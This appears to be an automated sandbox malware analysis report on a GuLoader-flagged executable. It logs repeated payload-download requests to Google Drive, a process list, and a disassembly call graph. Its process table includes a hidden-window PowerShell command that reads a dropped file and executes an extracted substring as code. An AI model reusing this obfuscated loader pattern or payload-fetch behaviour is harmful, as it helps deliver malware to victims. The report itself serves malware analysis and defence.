                                                                                  2025-01-11 04:30:11 UTC464OUTGET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Cache-Control: no-cache
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:30:12 UTC1851INHTTP/1.1 404 Not Found
                                                                                  X-GUploader-UploadID: AFIdbgTZlFIqQx6lCF-u26JcAzTAF9Rkf_PAgvC82luLTwp2jnX7smWktigueoDKWbuJCEvI1vcIMZM
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:30:12 GMT
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-3T_8F_uCxaOzKx65EJOp1Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Content-Length: 1652
                                                                                  Server: UploadServer
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                                  Connection: close
                                                                                  2025-01-11 04:30:12 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 58 47 31 7a 30 7a 50 78 69 57 6e 2d 6e 72 38 4b 68 54 39 32 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HXG1z0zPxiWn-nr8KhT92g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  36192.168.2.449334216.58.206.464436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-11 04:30:13 UTC422OUTGET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Host: drive.google.com
                                                                                  Cache-Control: no-cache
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:30:13 UTC1920INHTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:30:13 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Content-Security-Policy: script-src 'nonce-w7Gz0Hj0sGqjhg3hojBBsw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  37192.168.2.449335142.250.185.1294436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-11 04:30:14 UTC464OUTGET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Cache-Control: no-cache
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:30:14 UTC1851INHTTP/1.1 404 Not Found
                                                                                  X-GUploader-UploadID: AFIdbgQor1AMDJBUT27l7U8xZmGPGFtthlOqL_2FHP4CKwhb74vZ0dv2WL4bEvPubnB75BKoE_b911M
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:30:14 GMT
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-WTsq79d1HfDmzx-pdQ1a_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Content-Length: 1652
                                                                                  Server: UploadServer
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                                  Connection: close
                                                                                  2025-01-11 04:30:14 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 50 67 5a 63 46 65 4c 56 6b 6f 31 46 4a 6c 55 63 75 63 50 49 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wPgZcFeLVko1FJlUcucPIQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  38192.168.2.449336216.58.206.464436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-11 04:30:15 UTC422OUTGET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Host: drive.google.com
                                                                                  Cache-Control: no-cache
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:30:15 UTC1920INHTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:30:15 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Content-Security-Policy: script-src 'nonce-zYK3zcn3sDoCQs5JLBhZEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Target ID:0
                                                                                  Start time:23:28:09
                                                                                  Start date:10/01/2025
                                                                                  Path:C:\Users\user\Desktop\AM983ebb5F.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\AM983ebb5F.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:732'452 bytes
                                                                                  MD5 hash:03ABC55B8081DADF39D55EBD481BEF1C
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:1
                                                                                  Start time:23:28:10
                                                                                  Start date:10/01/2025
                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:powershell.exe -windowstyle hidden "$Celeries=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Alternere.Mor';$Enedirektrs=$Celeries.SubString(13958,3);.$Enedirektrs($Celeries) "
                                                                                  Imagebase:0xbc0000
                                                                                  File size:433'152 bytes
                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:2
                                                                                  Start time:23:28:10
                                                                                  Start date:10/01/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:6
                                                                                  Start time:23:29:16
                                                                                  Start date:10/01/2025
                                                                                  Path:C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\Anthranil.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:732'452 bytes
                                                                                  MD5 hash:03ABC55B8081DADF39D55EBD481BEF1C
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.3009478955.000000000363A000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 50%, ReversingLabs
                                                                                  • Detection: 69%, Virustotal, Browse
                                                                                  Reputation:low
                                                                                  Has exited:false

                                                                                  Disassembly

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:22.5%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:16.5%
                                                                                    Total number of Nodes:1350
                                                                                    Total number of Limit Nodes:30
                                                                                    execution_graph 3738 404f43 GetDlgItem GetDlgItem 3739 404f95 7 API calls 3738->3739 3747 4051ba 3738->3747 3740 40503c DeleteObject 3739->3740 3741 40502f SendMessageW 3739->3741 3742 405045 3740->3742 3741->3740 3743 40507c 3742->3743 3748 406594 21 API calls 3742->3748 3745 4044d6 22 API calls 3743->3745 3744 40529c 3746 405348 3744->3746 3751 4051ad 3744->3751 3757 4052f5 SendMessageW 3744->3757 3750 405090 3745->3750 3752 405352 SendMessageW 3746->3752 3753 40535a 3746->3753 3747->3744 3772 405229 3747->3772 3792 404e91 SendMessageW 3747->3792 3749 40505e SendMessageW SendMessageW 3748->3749 3749->3742 3756 4044d6 22 API calls 3750->3756 3754 40453d 8 API calls 3751->3754 3752->3753 3760 405373 3753->3760 3761 40536c ImageList_Destroy 3753->3761 3768 405383 3753->3768 3759 405549 3754->3759 3773 4050a1 3756->3773 3757->3751 3763 40530a SendMessageW 3757->3763 3758 40528e SendMessageW 3758->3744 3764 40537c GlobalFree 3760->3764 3760->3768 3761->3760 3762 4054fd 3762->3751 3769 40550f ShowWindow GetDlgItem ShowWindow 3762->3769 3766 40531d 3763->3766 3764->3768 3765 40517c GetWindowLongW SetWindowLongW 3767 405195 3765->3767 3777 40532e SendMessageW 3766->3777 3770 4051b2 3767->3770 3771 40519a ShowWindow 3767->3771 3768->3762 3785 4053be 3768->3785 3797 404f11 3768->3797 3769->3751 3791 40450b SendMessageW 3770->3791 3790 40450b SendMessageW 3771->3790 3772->3744 3772->3758 3773->3765 3776 4050f4 SendMessageW 3773->3776 3778 405177 3773->3778 3779 405132 SendMessageW 3773->3779 3780 405146 SendMessageW 3773->3780 3776->3773 3777->3746 3778->3765 3778->3767 3779->3773 3780->3773 3782 4054c8 3783 4054d3 InvalidateRect 3782->3783 3787 4054df 3782->3787 3783->3787 3784 4053ec SendMessageW 3786 405402 3784->3786 3785->3784 3785->3786 3786->3782 3788 405476 SendMessageW SendMessageW 3786->3788 3787->3762 3806 404e4c 3787->3806 3788->3786 3790->3751 3791->3747 3793 404ef0 SendMessageW 3792->3793 3794 404eb4 GetMessagePos ScreenToClient SendMessageW 3792->3794 3795 404ee8 3793->3795 3794->3795 3796 404eed 3794->3796 3795->3772 3796->3793 3809 406557 lstrcpynW 3797->3809 3799 404f24 3810 40649e wsprintfW 3799->3810 3801 404f2e 3802 40140b 2 API calls 3801->3802 3803 404f37 3802->3803 3811 406557 lstrcpynW 3803->3811 3805 404f3e 3805->3785 3812 404d83 3806->3812 3808 404e61 3808->3762 3809->3799 3810->3801 3811->3805 3813 404d9c 3812->3813 3814 406594 21 API calls 3813->3814 3815 404e00 3814->3815 3816 406594 21 API calls 3815->3816 3817 404e0b 3816->3817 3818 406594 21 API calls 3817->3818 3819 404e21 lstrlenW wsprintfW SetDlgItemTextW 3818->3819 3819->3808 3820 402643 3821 402672 3820->3821 3822 402657 3820->3822 3824 4026a2 3821->3824 3825 402677 3821->3825 3823 402d89 21 API calls 3822->3823 3834 40265e 3823->3834 3827 402dab 21 API calls 3824->3827 3826 402dab 21 API calls 3825->3826 3828 40267e 3826->3828 3829 4026a9 lstrlenW 3827->3829 3837 406579 WideCharToMultiByte 3828->3837 3829->3834 3831 402692 lstrlenA 3831->3834 3832 4026d6 3833 4026ec 3832->3833 3835 4060f9 WriteFile 3832->3835 3834->3832 3834->3833 3838 406128 SetFilePointer 3834->3838 3835->3833 3837->3831 3839 406144 3838->3839 3840 40615c 3838->3840 3841 4060ca ReadFile 3839->3841 3840->3832 3842 406150 3841->3842 3842->3840 3843 406165 SetFilePointer 3842->3843 3844 40618d SetFilePointer 3842->3844 3843->3844 3845 406170 3843->3845 3844->3840 3846 4060f9 WriteFile 3845->3846 3846->3840 3015 401946 3016 401948 3015->3016 3017 402dab 21 API calls 3016->3017 3018 40194d 3017->3018 3021 405c63 3018->3021 3061 405f2e 3021->3061 3024 405ca2 3027 405dcd 3024->3027 3075 406557 lstrcpynW 3024->3075 3025 405c8b DeleteFileW 3026 401956 3025->3026 3027->3026 3104 4068b4 FindFirstFileW 3027->3104 3029 405cc8 3030 405cdb 3029->3030 3031 405cce lstrcatW 3029->3031 3076 405e72 lstrlenW 3030->3076 3032 405ce1 3031->3032 3035 405cf1 lstrcatW 3032->3035 3036 405ce7 3032->3036 3039 405cfc lstrlenW FindFirstFileW 3035->3039 3036->3035 3036->3039 3038 405deb 3107 405e26 lstrlenW CharPrevW 3038->3107 3041 405dc2 3039->3041 3042 405d1e 3039->3042 3041->3027 3044 405da5 FindNextFileW 3042->3044 3054 405c63 64 API calls 3042->3054 3056 4055dc 28 API calls 3042->3056 3080 406557 lstrcpynW 3042->3080 3081 405c1b 3042->3081 3089 4055dc 3042->3089 3100 406317 MoveFileExW 3042->3100 3044->3042 3048 405dbb FindClose 3044->3048 3045 405c1b 5 API calls 3047 405dfd 3045->3047 3049 405e17 3047->3049 3050 405e01 3047->3050 3048->3041 3052 4055dc 28 API calls 3049->3052 3050->3026 3053 4055dc 28 API calls 3050->3053 3052->3026 3055 405e0e 3053->3055 3054->3042 3057 406317 40 API calls 3055->3057 3056->3044 3058 405e15 3057->3058 3058->3026 3110 406557 lstrcpynW 3061->3110 3063 405f3f 3111 405ed1 CharNextW CharNextW 3063->3111 3066 405c83 3066->3024 3066->3025 3067 406805 5 API calls 3073 405f55 3067->3073 3068 405f86 lstrlenW 3069 405f91 3068->3069 3068->3073 3071 405e26 3 API calls 3069->3071 3070 4068b4 2 API calls 3070->3073 3072 405f96 GetFileAttributesW 3071->3072 3072->3066 3073->3066 3073->3068 3073->3070 3074 405e72 2 API calls 3073->3074 3074->3068 3075->3029 3077 405e80 3076->3077 3078 405e92 3077->3078 3079 405e86 CharPrevW 3077->3079 3078->3032 3079->3077 3079->3078 3080->3042 3117 406022 GetFileAttributesW 3081->3117 3084 405c48 3084->3042 3085 405c36 RemoveDirectoryW 3087 405c44 3085->3087 3086 405c3e DeleteFileW 3086->3087 3087->3084 3088 405c54 SetFileAttributesW 3087->3088 3088->3084 3090 4055f7 3089->3090 3099 405699 3089->3099 3091 405613 lstrlenW 3090->3091 3092 406594 21 API calls 3090->3092 3093 405621 lstrlenW 3091->3093 3094 40563c 3091->3094 3092->3091 3095 405633 lstrcatW 3093->3095 3093->3099 3096 405642 SetWindowTextW 3094->3096 3097 40564f 3094->3097 3095->3094 3096->3097 3098 405655 SendMessageW SendMessageW SendMessageW 3097->3098 3097->3099 3098->3099 3099->3042 3101 406338 3100->3101 3102 40632b 3100->3102 3101->3042 3120 40619d 3102->3120 3105 405de7 3104->3105 3106 4068ca FindClose 3104->3106 3105->3026 3105->3038 3106->3105 3108 405e42 lstrcatW 3107->3108 3109 405df1 3107->3109 3108->3109 3109->3045 3110->3063 3112 405eee 3111->3112 3114 405f00 3111->3114 3113 405efb CharNextW 3112->3113 3112->3114 3116 405f24 3113->3116 3115 405e53 CharNextW 3114->3115 3114->3116 3115->3114 3116->3066 3116->3067 3118 405c27 3117->3118 3119 406034 SetFileAttributesW 3117->3119 3118->3084 3118->3085 3118->3086 3119->3118 3121 4061f3 GetShortPathNameW 3120->3121 3122 4061cd 3120->3122 3123 406312 3121->3123 3124 406208 3121->3124 3147 406047 GetFileAttributesW CreateFileW 3122->3147 3123->3101 3124->3123 3126 406210 wsprintfA 3124->3126 3128 406594 21 API calls 3126->3128 3127 4061d7 CloseHandle GetShortPathNameW 3127->3123 3129 4061eb 3127->3129 3130 406238 3128->3130 3129->3121 3129->3123 3148 406047 GetFileAttributesW CreateFileW 3130->3148 3132 406245 3132->3123 3133 406254 GetFileSize GlobalAlloc 3132->3133 3134 406276 3133->3134 3135 40630b CloseHandle 3133->3135 3149 4060ca ReadFile 3134->3149 3135->3123 3140 406295 lstrcpyA 3143 4062b7 3140->3143 3141 4062a9 3142 405fac 4 API calls 3141->3142 3142->3143 3144 4062ee SetFilePointer 3143->3144 3156 4060f9 WriteFile 3144->3156 3147->3127 3148->3132 3150 4060e8 3149->3150 3150->3135 3151 405fac lstrlenA 3150->3151 3152 405fed lstrlenA 3151->3152 3153 405ff5 3152->3153 3154 405fc6 lstrcmpiA 3152->3154 3153->3140 3153->3141 3154->3153 3155 405fe4 CharNextA 3154->3155 3155->3152 3157 406117 GlobalFree 3156->3157 3157->3135 3158 4015c6 3159 402dab 21 API calls 3158->3159 3160 4015cd 3159->3160 3161 405ed1 4 API calls 3160->3161 3173 4015d6 3161->3173 3162 401636 3164 401668 3162->3164 3165 40163b 3162->3165 3163 405e53 CharNextW 3163->3173 3168 401423 28 API calls 3164->3168 3183 401423 3165->3183 3175 401660 3168->3175 3172 40164f SetCurrentDirectoryW 3172->3175 3173->3162 3173->3163 3174 40161c GetFileAttributesW 3173->3174 3177 405b22 3173->3177 3180 405aab CreateDirectoryW 3173->3180 3187 405b05 CreateDirectoryW 3173->3187 3174->3173 3178 40694b 5 API calls 3177->3178 3179 405b29 3178->3179 3179->3173 3181 405af7 3180->3181 3182 405afb GetLastError 3180->3182 3181->3173 3182->3181 3184 4055dc 28 API calls 3183->3184 3185 401431 3184->3185 3186 406557 lstrcpynW 3185->3186 3186->3172 3188 405b15 3187->3188 3189 405b19 GetLastError 3187->3189 3188->3173 3189->3188 3847 404646 lstrlenW 3848 404665 3847->3848 3849 404667 WideCharToMultiByte 3847->3849 3848->3849 3850 4049c7 3851 4049f3 3850->3851 3852 404a04 3850->3852 3911 405b9b GetDlgItemTextW 3851->3911 3853 404a10 GetDlgItem 3852->3853 3856 404a6f 3852->3856 3855 404a24 3853->3855 3860 404a38 SetWindowTextW 3855->3860 3863 405ed1 4 API calls 3855->3863 3857 404b53 3856->3857 3865 406594 21 API calls 3856->3865 3909 404d02 3856->3909 3857->3909 3913 405b9b GetDlgItemTextW 3857->3913 3858 4049fe 3859 406805 5 API calls 3858->3859 3859->3852 3864 4044d6 22 API calls 3860->3864 3862 40453d 8 API calls 3867 404d16 3862->3867 3868 404a2e 3863->3868 3869 404a54 3864->3869 3870 404ae3 SHBrowseForFolderW 3865->3870 3866 404b83 3871 405f2e 18 API calls 3866->3871 3868->3860 3875 405e26 3 API calls 3868->3875 3872 4044d6 22 API calls 3869->3872 3870->3857 3873 404afb CoTaskMemFree 3870->3873 3874 404b89 3871->3874 3876 404a62 3872->3876 3877 405e26 3 API calls 3873->3877 3914 406557 lstrcpynW 3874->3914 3875->3860 3912 40450b SendMessageW 